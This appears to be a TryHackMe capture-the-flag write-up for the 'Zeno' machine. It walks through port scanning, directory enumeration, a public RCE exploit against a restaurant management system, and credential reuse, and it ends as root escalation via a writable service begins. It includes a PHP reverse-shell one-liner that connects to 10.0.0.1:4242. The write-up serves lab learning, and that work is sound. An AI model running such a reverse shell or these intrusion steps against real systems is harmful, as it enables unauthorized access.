Zeno - THM Writeup

4 min readOct 31, 2021

Introduction:

Perform a penetration test against a vulnerable machine. Your end-goal is to become the root user and retrieve the two flags:

/home/{{user}}/user.txt
/root/root.txt

The flags are always in the same format, where XYZ is a MD5 hash: THM{XYZ}

The machine can take some time to fully boot up, so please be patient! :)

Overview:

Enumerating network, found 2 open ports (ssh:22 and http:12340). Then enumerating web, found RCE exploit for RMS which lead to reverse shell. Then, enumerating the file system, found plain text credentials in a service which were reused in ssh login. Then, exploiting the weak file permissions on a service, easily got root

Methodology:

Starting by port scanning we found two ports open. One of them is hosting webserver.

Opening the webpage, we get a custom 404. So we gotta enumerate the web further using gobuster.

Enumerating the web using gobuster we find a hidden directory.

Navigating to the webpage we found, it’s a some kind of restaurant management system.

As it’s a RMS, so there must be some kind of administrative login. So we gotta keep enumerating further.

Using gobuster we found the admin login page.

But, it was just rabbit hole. I tried some default credentials but it didn’t work. So, i went to Master Google. Thankfully, i found a RCE exploit on exploit db.

Using the searchsploit, i copied the exploit in my working directory.

Successfully running the exploit we get a webshell.

In order to get a stable reverse shell, i used the following PHP oneliner from payload all the things repo and netcat listener on my machine.

php -r ‘$sock=fsockopen(“10.0.0.1”,4242);$proc=proc_open(“/bin/sh -i”, array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);’

Analyzing the /etc/passwd file found the user edward. So, to escalate my privileges to edward, i tranfered the the linpeas.sh file to the server for enumeration.

PEASS-ng/linPEAS at master · carlospolop/PEASS-ng

PEASS - Privilege Escalation Awesome Scripts SUITE (with colors) - PEASS-ng/linPEAS at master · carlospolop/PEASS-ng

github.com

Using linpeas, we found plain text credentials stored in a file.

Using the found credentials, we successfully login into ssh as edward user.

Now, to escalate the privileges to root, we know that we cam run reboot command as sudo and from the previous linpeas enumeration we also know that we have write privileges over monitoring service (screenshot below):